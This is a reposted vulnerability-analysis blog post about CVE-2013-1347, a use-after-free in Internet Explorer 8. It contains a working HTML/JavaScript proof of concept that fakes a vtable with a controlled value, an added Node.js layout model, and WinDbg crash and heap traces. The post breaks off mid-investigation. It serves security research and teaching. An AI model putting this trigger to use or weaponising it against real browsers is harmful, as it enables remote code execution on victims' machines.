
CVE-2013-1347 Microsoft Internet Explorer 8 Remote Code Execution Vulnerability

Posted: 2016-07-29 18:27:38


[CNNVD] Microsoft Internet Explorer 8 Remote Code Execution Vulnerability (CNNVD-201305-092)

        Microsoft Internet Explorer is the web browser bundled by default with the Windows operating system from Microsoft Corporation (USA).
        A remote code execution vulnerability exists in the way Internet Explorer accesses an object that has not been correctly initialized or has already been deleted. The vulnerability may corrupt memory in a way that allows an attacker to execute arbitrary code in the context of the current user. An attacker could host a specially crafted website designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website.

PoC:

<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
    <?IMPORT namespace="t" implementation="#default#time2">
</meta>

<script>
function helloWorld()
{
    animvalues = ""; 

    // mshtml!CElement::Doc:
    // 6586c815 8b01            mov     eax,dword ptr [ecx]
    // 6586c817 8b5070          mov     edx,dword ptr [eax+70h]
    // 6586c81a ffd2            call    edx

    for (i=0; i <= 0x70/4; i++) {
        // The first value in the t:ANIMATECOLOR list overwrites the vtable pointer,
        // so this string serves as the fake vtable. The virtual call indexes the
        // vtable at offset 0x70, hence 0x70/4 DWORDs of filler before the slot
        // whose contents end up in edx.
        if (i == 0x70/4) {
            //animvalues += unescape("%u5ed5%u77c1");   
            animvalues += unescape("%u4141%u4141");   // edx = 0x41414141
        }
        else {
            animvalues += unescape("%u4242%u4242");      // 0x42424242
        }    
    }

    for(i = 0; i < 13; i++) {
        // The t:ANIMATECOLOR value is a semicolon-separated string. The number of
        // semicolons determines the size of the parsed list, each element of which
        // is a pointer to one of the substrings.
        // The vulnerable object, CGenericElement, is 0x4c bytes, so the string is
        // given 13 semicolons to make the list allocation match that size.
        animvalues += ";red";        
    }

    f0 = document.createElement('span');
    document.body.appendChild(f0);
    f1 = document.createElement('span');
    document.body.appendChild(f1);
    f2 = document.createElement('span');
    document.body.appendChild(f2);
    document.body.contentEditable="true";
    f2.appendChild(document.createElement('datalist'));
    f1.appendChild(document.createElement('span'));
    f1.appendChild(document.createElement('table'));
    try{
        f0.offsetParent=null;
    }catch(e) {}

    f2.innerHTML="";
    f0.appendChild(document.createElement('hr'));
    f1.innerHTML="";

    CollectGarbage();

    try {
        // The content of the t:ANIMATECOLOR element can be set freely, which
        // controls the size of the allocated object.
        a = document.getElementById('myanim');
        a.values = animvalues;
    }
    catch(e) {}
}
</script>
</head>
<body onload="eval(helloWorld());">
<t:ANIMATECOLOR id="myanim"/>
</body>
</html>
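
As an added example (not part of the original post), the following Node.js script models the memory layout that the PoC's animvalues string produces, so the 0x70/4 arithmetic in the comments can be checked without IE8. The model is taken from the PoC's own comments and is an assumption: the freed CGenericElement is reoccupied by the parsed t:ANIMATECOLOR value list, whose first pointer (to the first substring) lands where the vtable pointer was, and mshtml then reads the function pointer at offset 0x70 of that substring's UTF-16LE bytes. The helper names, the use of split(";") as a stand-in for mstime's parser, and the fixed count of 13 extra values (taken from the PoC rather than derived) are mine.

```javascript
// Added example: model the fake-vtable layout built by the PoC's animvalues
// string. Not from the original post; the helper names are my own.
//
// Assumed model (from the PoC comments): after the free, ecx still points at the
// old CGenericElement, now backed by the parsed value list. Element 0 of that list
// points at the first substring, so mshtml's
//     mov eax,[ecx] ; mov edx,[eax+70h] ; call edx
// reads eax = pointer to our string and edx = DWORD at offset 0x70 inside it.

const SLOT_OFFSET = 0x70;      // vtable slot that CElement::Doc indexes
const FILLER = 0x42424242;     // value placed in every other slot
const TARGET = 0x41414141;     // value the PoC wants to land in edx
const EXTRA_VALUES = 13;       // ";red" count used by the PoC (not derived here)

// Equivalent of unescape("%uLLLL%uHHHH"): two UTF-16 code units, low half first,
// which in memory (UTF-16LE) become the four little-endian bytes of `dword`.
function dwordToUnits(dword) {
  return String.fromCharCode(dword & 0xffff, (dword >>> 16) & 0xffff);
}

// Mirrors the PoC's first loop: slotOffset/4 + 1 DWORDs, the last one being the
// value that the virtual call will load into edx.
function buildFakeVtable(slotOffset, slotValue, filler) {
  let s = "";
  for (let i = 0; i <= slotOffset / 4; i++) {
    s += dwordToUnits(i === slotOffset / 4 ? slotValue : filler);
  }
  return s;
}

// Mirrors the PoC's second loop: extra ';'-separated values so the parsed list
// allocation takes over the freed object's slot.
function buildAnimValues(slotOffset, slotValue, filler, extraValues) {
  let s = buildFakeVtable(slotOffset, slotValue, filler);
  for (let i = 0; i < extraValues; i++) s += ";red";
  return s;
}

// JS string -> bytes as a BSTR stores them (UTF-16LE, no terminator).
function toUtf16LeBytes(str) {
  const out = [];
  for (let i = 0; i < str.length; i++) {
    const u = str.charCodeAt(i);
    out.push(u & 0xff, u >> 8);
  }
  return out;
}

// Little-endian DWORD read, returned as an unsigned 32-bit number.
function readDword(bytes, off) {
  return (bytes[off] | (bytes[off + 1] << 8) | (bytes[off + 2] << 16) | (bytes[off + 3] << 24)) >>> 0;
}

// Simulate what CElement::Doc does with the replaced object: element 0 of the
// parsed value list is treated as the vtable, and edx is the DWORD at slotOffset.
function simulateDispatch(animvalues, slotOffset) {
  const list = animvalues.split(";");        // stand-in for mstime's value parser (assumed)
  const fakeVtable = toUtf16LeBytes(list[0]);
  return {
    listEntries: list.length,
    vtableBytes: fakeVtable.length,
    edx: readDword(fakeVtable, slotOffset),
  };
}

const animvalues = buildAnimValues(SLOT_OFFSET, TARGET, FILLER, EXTRA_VALUES);
const r = simulateDispatch(animvalues, SLOT_OFFSET);
console.log("semicolons:", animvalues.split(";").length - 1,
            "fake vtable bytes: 0x" + r.vtableBytes.toString(16),
            "edx: 0x" + r.edx.toString(16));
```

Running it reports 13 semicolons, 0x74 bytes of fake vtable and edx = 0x41414141. Swapping TARGET for the commented-out 0x77c15ed5 shows why the PoC writes the low half (%u5ed5) before the high half (%u77c1): the code units are laid out in address order, so the low unit has to come first for the DWORD to read back correctly.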

Opening the PoC produces the crash below; page heap (gflags +hpa) and user-mode stack trace recording (+ust) were enabled.

(4dc.8f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=66c25100 ebx=17a72fb0 ecx=09106fc8 edx=00000000 esi=045fedc8 edi=00000000
eip=668ac400 esp=045fed9c ebp=045fedb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc:
668ac400 8b01            mov     eax,dword ptr [ecx]  ds:0023:09106fc8=????????

The surrounding disassembly is shown below. It is an ordinary virtual call on an object: the first three instructions load the vtable pointer from the object, index a function pointer out of the vtable at offset 0x70, and call it. The crash happens on the very first dereference, of ecx, which holds the object's this pointer.

1:017> u 668ac400
mshtml!CElement::Doc:
668ac400 8b01            mov     eax,dword ptr [ecx]
668ac402 8b5070          mov     edx,dword ptr [eax+70h]
668ac405 ffd2            call    edx
668ac407 8b400c          mov     eax,dword ptr [eax+0Ch]
668ac40a c3              ret
668ac40b 33c0            xor     eax,eax
668ac40d e9f7aeffff      jmp     mshtml!CAttrArray::PrivateFind+0x8f (668a7309)
668ac412 90              nop

Look at ecx, shown below: it is not readable. So finding out what ecx was pointing to is the key to the problem.

1:017> dc ecx
09106fc8  ???????? ???????? ???????? ????????  ????????????????
09106fd8  ???????? ???????? ???????? ????????  ????????????????
09106fe8  ???????? ???????? ???????? ????????  ????????????????
09106ff8  ???????? ???????? ???????? ????????  ????????????????
09107008  ???????? ???????? ???????? ????????  ????????????????
09107018  ???????? ???????? ???????? ????????  ????????????????
09107028  ???????? ???????? ???????? ????????  ????????????????
09107038  ???????? ???????? ???????? ????????  ????????????????

Check whether ecx belongs to the heap. As shown below, it does, and the heap block's stack trace shows it is an allocation that has already been freed: a clear use-after-free. Looking at which object this is, the free happens under CEventObj::`vector deleting destructor', so it appears to be a CEventObj object. Note that this trace records the path that freed the block (HeapFree called from that destructor), while the PoC's comments identify the vulnerable object as CGenericElement, so this guess still needs to be verified.

1:017> !heap -p -a ecx
    address 09106fc8 found in
    _DPH_HEAP_ROOT @ 51000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7093c98:          9106000             2000
    737e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77955674 ntdll!RtlDebugFreeHeap+0x0000002f
    77917aca ntdll!RtlpFreeHeap+0x0000005d
    778e2d68 ntdll!RtlFreeHeap+0x00000142
    76fff1ac kernel32!HeapFree+0x00000014
    668b7dfc mshtml!CEventObj::`vector deleting destructor+0x00000022
    668b7dd0 mshtml!CBase::SubRelease+0x00000022
    668ab034 mshtml!PlainRelease+0x00000025
    69e398ea mstime!CEventMgr::_FireEvent+0x000001c0
    69dfd9db mstime!CTIMEElementBase::FireEvents+0x000000ce
    69dfb7c9 mstime!CTIMEElementBase::FireEvent+0x0000016e
    69e00521 mstime!MMBaseBvr::TEBvr::eventNotify+0x000000ac
    69e49379 mstime!EventDispatcher::DoIt+0x0000001c
    69e492bb mstime!Dispatch+0x00000083
    69e493b7 mstime!CNodeBvrList::DispatchEventNotify+0x00000035
    69e46f95 mstime!CEventData::CallEvent+0x00000021
    69e442a6 mstime!CTIMENodeMgr::tick+0x000000ec
    69e00b05 mstime!MMPlayer::Tick+0x0000004a
    69e00b62 mstime!MMPlayer::OnTimer+0x00000036
    69df720e mstime!CTIMEBodyElement::StartRootTime+0x000000a2
    69df6ee4 mstime!CTIMEBodyElement::OnLoad+0x0000002f
    69dfd528 mstime!CTIMEElementBase::onLoadEvent+0x0000001e
    69e39e54 mstime!CEventMgr::Invoke+0x00000230
    6690be60 mshtml!CBase::InvokeEvent+0x00000512
    668ff3f1 mshtml!COmWindowProxy::FireEvent+0x00000169
    66896a12 mshtml!COmWindowProxy::Fire_onload+0x000000d5
    66896dde mshtml!CMarkup::OnLoadStatusDone+0x0000040a
    66896aaf mshtml!CMarkup::OnLoadStatus+0x00000047
    66896fad mshtml!CProgSink::DoUpdate+0x00000549
    66824fab mshtml!CProgSink::OnMethodCall+0x00000012
    668c94b2 mshtml!GlobalWndOnMethodCall+0x000000ff
    668b37f7 mshtml!GlobalWndProc+0x0000010c

To verify our guess, let's look at how the object involved in the UAF gets allocated. First, set a breakpoint on the object's destructor as follows.

1:017> x mshtml!CEventObj::`vector deleting destructor
668b7dda mshtml!CEventObj::`vector deleting destructor = <no type information>
1:017> bu 668b7dda 
1:017> bl
 0 e 668b7dda     0001 (0001)  1:**** mshtml!CEventObj::`scalar deleting destructor

Reload the process, and don't forget to set .childdbg 1. Having to set it again on every run is annoying; I don't know how to save the setting.


Original article: http://www.cnblogs.com/Ox9A82/p/5719187.html
